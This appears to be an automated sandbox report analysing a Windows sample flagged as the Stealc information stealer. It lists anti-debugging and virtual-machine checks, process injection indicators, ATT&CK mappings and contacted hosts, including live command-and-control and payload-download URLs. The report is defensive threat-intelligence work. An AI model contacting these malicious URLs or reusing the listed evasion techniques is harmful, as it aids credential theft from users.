                  Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeAPI call chain: ExitProcess graph end nodegraph_3-34046
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_00404980 VirtualProtect 00000000,00000004,00000100,?3_2_00404980
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]0_2_0042FE5F
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_00AF9893 push dword ptr fs:[00000030h]0_2_00AF9893
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_025200C6 mov eax, dword ptr fs:[00000030h]0_2_025200C6
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_024F092B mov eax, dword ptr fs:[00000030h]0_2_024F092B
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_024F0D90 mov eax, dword ptr fs:[00000030h]0_2_024F0D90
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_004263C0 mov eax, dword ptr fs:[00000030h]3_2_004263C0
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0092A99B push dword ptr fs:[00000030h]3_2_0092A99B
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_024A6627 mov eax, dword ptr fs:[00000030h]3_2_024A6627
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_0248092B mov eax, dword ptr fs:[00000030h]3_2_0248092B
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_02480D90 mov eax, dword ptr fs:[00000030h]3_2_02480D90
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0043BBC1 GetProcessHeap,0_2_0043BBC1
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104D3
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_00410666 SetUnhandledExceptionFilter,0_2_00410666
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F911
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0251A63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0251A63A
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0250073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0250073A
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_024FFB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_024FFB78
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_025008CD SetUnhandledExceptionFilter,0_2_025008CD
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_024A9A10 SetUnhandledExceptionFilter,3_2_024A9A10
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_024A7E31 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_024A7E31
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_024A784F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_024A784F
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeMemory protected: page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: 8DF0.tmp.exe PID: 1280, type: MEMORYSTR
                  Searches for specific processes (likely to inject)
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_004246C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,3_2_004246C0
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_024A4897 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,3_2_024A4897
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_024A4927 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,3_2_024A4927
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeProcess created: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe "C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_0041077B cpuid 0_2_0041077B
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B00A
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: GetLocaleInfoW,0_2_004351C0
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: EnumSystemLocalesW,0_2_0043B2CD
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: EnumSystemLocalesW,0_2_0043B282
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: EnumSystemLocalesW,0_2_0043B368
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3F5
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: GetLocaleInfoW,0_2_0043B645
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B76E
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: GetLocaleInfoW,0_2_0043B875
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B942
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: EnumSystemLocalesW,0_2_00434DCD
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0252B271
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: EnumSystemLocalesW,0_2_02525034
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: GetLocaleInfoW,0_2_02525427
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: EnumSystemLocalesW,0_2_0252B4E9
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: EnumSystemLocalesW,0_2_0252B534
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: EnumSystemLocalesW,0_2_0252B5CF
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: GetLocaleInfoW,0_2_0252BADC
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0252BBA9
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: GetLocaleInfoW,0_2_0252B8A3
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: GetLocaleInfoW,0_2_0252B8AC
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0252B9D5
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_024A2F67
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103CD
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_004229E0 GetProcessHeap,HeapAlloc,GetUserNameA,3_2_004229E0
                  Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exeCode function: 3_2_024A2E17 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,3_2_024A2E17
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163EA
                  Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Stealc
                  Source: Yara matchFile source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.8DF0.tmp.exe.24c0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.8DF0.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.8DF0.tmp.exe.24c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.8DF0.tmp.exe.2480e67.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.8DF0.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1561878307.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1833942307.0000000000948000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 8DF0.tmp.exe PID: 1280, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Stealc
                  Source: Yara matchFile source: 3.2.8DF0.tmp.exe.2480e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.8DF0.tmp.exe.24c0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.8DF0.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.8DF0.tmp.exe.24c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.8DF0.tmp.exe.2480e67.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.8DF0.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1561878307.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1833942307.0000000000948000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 8DF0.tmp.exe PID: 1280, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218CC
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BF6
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_02511B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_02511B33
                  Source: C:\Users\user\Desktop\ssB9bjDQPf.exeCode function: 0_2_02510E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_02510E5D

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		OS Credential Dumping2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Create Account                  		111
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory1
                  Account Discovery                  		Remote Desktop Protocol3
                  Clipboard Data                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information                  		Security Account Manager2
                  File and Directory Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                  Software Packing                  		NTDS44
                  System Information Discovery                  		Distributed Component Object ModelInput Capture113
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets1
                  Query Registry                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials131
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Virtualization/Sandbox Evasion                  		DCSync1
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                  Process Injection                  		Proc Filesystem12
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  ssB9bjDQPf.exe45%ReversingLabs
                  ssB9bjDQPf.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe45%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe45%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://post-to-me.com/track_prt.php?sub=0&cc=DE_100%Avira URL Cloudmalware
                  http://92.255.57.89/45c616e921a794b8.php100%Avira URL Cloudmalware
                  http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE0%Avira URL Cloudsafe
                  http://92.255.57.89100%Avira URL Cloudmalware
                  http://92.255.57.89=8P0%Avira URL Cloudsafe
                  http://176.113.115.19/ScreenUpdateSync.exex0%Avira URL Cloudsafe
                  http://92.255.57.89/T100%Avira URL Cloudmalware
                  http://92.255.57.89/100%Avira URL Cloudmalware
                  https://post-to-me.com/track_prt.php?sub=0&cc=DEu100%Avira URL Cloudmalware
                  http://92.255.57.89/A100%Avira URL Cloudmalware
                  http://176.113.115.19/ScreenUpdateSync.exe0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  post-to-me.com
                  		172.67.179.207
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://92.255.57.89/45c616e921a794b8.phptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                      		high
                      http://92.255.57.89/true
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://post-to-me.com/track_prt.php?sub=&cc=DEssB9bjDQPf.exe, 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
                        https://post-to-me.com/track_prt.php?sub=0&cc=DE_ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B70000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWAREssB9bjDQPf.exe, 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://92.255.57.898DF0.tmp.exe, 00000003.00000002.1833877398.000000000091E000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://post-to-me.com/track_prt.php?sub=ssB9bjDQPf.exefalse
                          		high
                          http://92.255.57.89=8P8DF0.tmp.exe, 00000003.00000002.1833877398.000000000091E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://92.255.57.89/T8DF0.tmp.exe, 00000003.00000002.1833942307.0000000000948000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://post-to-me.com/track_prt.php?sub=0&cc=DEussB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B70000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://176.113.115.19/ScreenUpdateSync.exexssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B97000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://post-to-me.com/ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B70000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://upx.sf.netAmcache.hve.7.drfalse
                              		high
                              http://92.255.57.89/A8DF0.tmp.exe, 00000003.00000002.1833942307.0000000000985000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://176.113.115.19/ScreenUpdateSync.exessB9bjDQPf.exe, ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B70000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              172.67.179.207
                              		post-to-me.comUnited States
                              		13335CLOUDFLARENETUSfalse
                              92.255.57.89
                              		unknownRussian Federation
                              		42253TELSPRUtrue
                              176.113.115.19
                              		unknownRussian Federation
                              		49505SELECTELRUfalse

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1572687
                              Start date and time:2024-12-10 18:57:38 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 7m 45s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:12
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:ssB9bjDQPf.exe
                              renamed because original name is a hash value
                              Original Sample Name:26ceb3d9dcc1821192b39eea6832d51d.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@4/7@1/3
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 92%
                              • Number of executed functions: 50
                              • Number of non-executed functions: 345
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.12.23.50, 20.190.177.20
                              • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: ssB9bjDQPf.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              12:58:41API Interceptor9189858x Sleep call for process: ssB9bjDQPf.exe modified
                              12:59:14API Interceptor1x Sleep call for process: WerFault.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              172.67.179.2076X4BIzTTBR.exeGet hashmaliciousStealcBrowse
                                IeccNv7PP6.exeGet hashmaliciousStealc, VidarBrowse
                                  XOr3Kqyo9n.exeGet hashmaliciousStealcBrowse
                                    0r9PL33C8E.exeGet hashmaliciousStealcBrowse
                                      Pw2KHOL9Z8.exeGet hashmaliciousStealcBrowse
                                        o3QbCA4xLs.exeGet hashmaliciousStealc, VidarBrowse
                                          XhYAqi0wi5.exeGet hashmaliciousStealcBrowse
                                            Uviv7rEtnt.exeGet hashmaliciousStealc, VidarBrowse
                                              GK059kPZ5B.exeGet hashmaliciousStealcBrowse
                                                w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                  92.255.57.89ief722WreR.exeGet hashmaliciousStealcBrowse
